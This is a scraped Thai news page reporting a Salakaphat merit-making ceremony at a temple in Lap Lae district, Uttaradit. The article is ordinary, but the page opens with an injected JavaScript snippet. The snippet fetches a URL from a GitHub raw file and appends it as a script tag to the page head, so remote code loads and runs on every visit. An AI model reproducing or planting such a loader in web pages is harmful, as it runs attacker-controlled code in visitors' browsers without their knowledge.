;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); อุตรดิตถ์ วัดกุฎีพระฤาษีทรงธรรม ต.ทุ่งยั้ง อ.ลับแล จ.อุตรดิตถ์ จัดสืบสานประเพณีสลากภัตรทาน - ThaiReference | อาสาไทยยืนยัน
อุตรดิตถ์ วัดกุฎีพระฤาษีทรงธรรม ต.ทุ่งยั้ง อ.ลับแล จ.อุตรดิตถ์ จัดสืบสานประเพณีสลากภัตรทาน

ที่วัดกุฎีพระฤาษีทรงธรรม ต.ทุ่งยั้ง อ.ลับแล จ.อุตรดิตถ์ พระศรีปริยัติวิมล รองเจ้าคณะจังหวัดอุตรดิตถ์เป็นประธารฝ่ายสงฆ์ พร้อมพระเถารานุเถระและพระภิกษุ สามเณร จำนวนกว่า 200 รูป เข้าร่วมงานประเพณีงานสลากภัตทาน ของวัดกุฎีพระฤาษีทรงธรรม  โดยมีพระครูนิวิฐเขมารักษ์เจ้าอาวาสวัดกุฎีพระฤาษีทรงธรรม พร้อมด้วยบรรดาสาธุชนที่ร่วมบุญในงานประเพณีสลากภัตทานในครั้งนี้ ประเพณีงานสลากภัตรทาน หรือที่เรียกกันทั่วไปว่า ประเพณีสลากภัต เป็นหนึ่งในประเพณีสำคัญของพุทธศาสนิกชนในประเทศไทย โดยเฉพาะในภาคเหนือและภาคกลาง มีรากฐานมาจากพุทธศาสนาและวัฒนธรรมท้องถิ่นที่เน้นเรื่องการทำบุญ การให้ทาน และการส่งเสริมความสามัคคีในชุมชน

จุดเริ่มต้นของประเพณีประเพณีสลากภัตรทานเริ่มขึ้นตั้งแต่ในอดีตที่ชาวบ้านต้องการทำบุญแต่ไม่ต้องการเลือกพระรูปใดรูปหนึ่งเป็นพิเศษ จึงใช้วิธีเขียนชื่อพระลงบนใบสลาก แล้วจับฉลากเพื่อถวายทานอย่างเป็นธรรม เสมอภาค และไม่มีการเลือกที่รักมักที่ชังนอกจากนี้ยังมีจุดประสงค์สำคัญคือ:ส่งเสริมให้ญาติโยมถวายทานอย่างทั่วถึงสร้างความยุติธรรมและความสมัครสมานในหมู่ชาวบ้านฝึกจิตใจให้เป็นกลาง ไม่ยึดติดกับบุคคล  ช่วงเวลาจัดงานประเพณีสลากภัตมักจัดขึ้นในช่วง หลังเข้าพรรษา จนถึง ก่อนออกพรรษา โดยเฉพาะในช่วง วันแรม 15 ค่ำ เดือน 10 หรือตามความเหมาะสมของแต่ละท้องถิ่น ความสำคัญของประเพณีสลากภัตรทานเป็นการ ส่งเสริมความเสมอภาคในการถวายทานสะท้อนถึง หลักธรรมทางพุทธศาสนา คือ การไม่ยึดติดและมีจิตใจเมตตาเป็นกิจกรรมที่สร้างความสัมพันธ์อันดีในชุมชนช่วย ธำรงรักษาขนบธรรมเนียม และสืบทอดวัฒนธรรมทางศาสนา

ณัฐวัฒน์ ราชประสิทธิ์ ภาพ/ข่าวอุตรดิตถ์